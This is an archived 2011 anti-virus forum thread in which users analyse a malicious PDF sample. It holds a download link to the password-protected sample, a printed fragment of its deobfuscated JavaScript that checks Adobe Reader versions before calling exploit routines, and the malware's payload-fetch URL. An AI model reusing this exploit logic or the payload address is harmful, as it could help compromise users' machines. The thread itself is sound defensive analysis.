Another virus sample (Nov 21)

Discussion in 'Anti-Virus' started by Virus Guy, Nov 22, 2011.

  1. Virus Guy

    Virus Guy Guest

    http://www.fileden.com/files/2008/7/19/2010382/A3D33.ZIP

    I submitted this to VT yesterday (or was it Sunday?) where it got a 30%
    detection rate.

    Password is "a" (no quotes).

    It's a pdf file.

    I can't bring up VT right now, and confirmed by
    http://downorjustforme.com/virustotal.com

    virustotal.com seems to be down :(

    I've been seeing lots of problems with VT lately - anyone know why?
     
    Virus Guy, Nov 22, 2011
    #1

  2. Real fun obfuscated JavaScript testing Adobe versions and then attempting exploits...

    if((lv==9)||((sv==8)&&(lv<=8.12)))
    {
    geticon();
    }
    else if(lv==7.1)
    {
    printf();
    }
    else if(((sv==6)||(sv==7))&&(lv<7.11))
    {
    bx();
    }
    else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17))
    {
    function a()
    {
    util.printd('p@111111111111111111111111 : yyyy111',new Date());
    }
    var h=app.plugIns;
    for(var f=0;f<h.length;f++)
    {
    if(h[f].name=='EScript')
    {
    var i=h[f].version;
    }
    }
    if((i>8.12)&&(i<8.2))


    Payload...
    asjdha903.co.cc/w.php?f=20&e=5

    I couldn't get it. asjdha903.co.cc resolved to 10.10.10.10,
    but isn't that a private address range? And if it is, maybe it was DNS poisoned for
    non-resolution.
     
    David H. Lipman, Nov 23, 2011
    #2

  3. Do you have something that does "Flatedecode" for you, or are these
    sandbox results?

    Odd looking stuff.
     
    FromTheRafters, Nov 23, 2011
    #3
  4. Virus Guy

    Virus Guy Guest

    Hmmm.

    See also:

    http://jsunpack.jeek.org/dec/go/?list=1&search=CVE-2010-0249

    (note the on-line JS decoder)
     
    Virus Guy, Nov 23, 2011
    #4
  5. Flat decode from obfuscated JavaScript to deobfuscated JavaScript to UCS-2 coded segment to
    hex of decoded segment to shellcode analysis to get payload URL.
     
    David H. Lipman, Nov 23, 2011
    #5

  6. JSunpack does not do well on this PDF at all (sorry Blake)

    The PDF uses multiple exploits including the vulnerability associated with an Adobe
    getIcon() buffer overflow condition.
    Reference: CVE-2009-0927
     
    David H. Lipman, Nov 23, 2011
    #6
  7. Thanks Ant. I had never seen the name "Flatedecode" before and just
    figured it was yet another layer of obfuscation that when reversed would
    reveal the eval buried in that string and remove junk from the data it
    would eventually evaluate.
     
    FromTheRafters, Nov 23, 2011
    #7
  8. LOL. I thought that was a spelling error and you were writing "Flat decode" ;-)
     
    David H. Lipman, Nov 24, 2011
    #8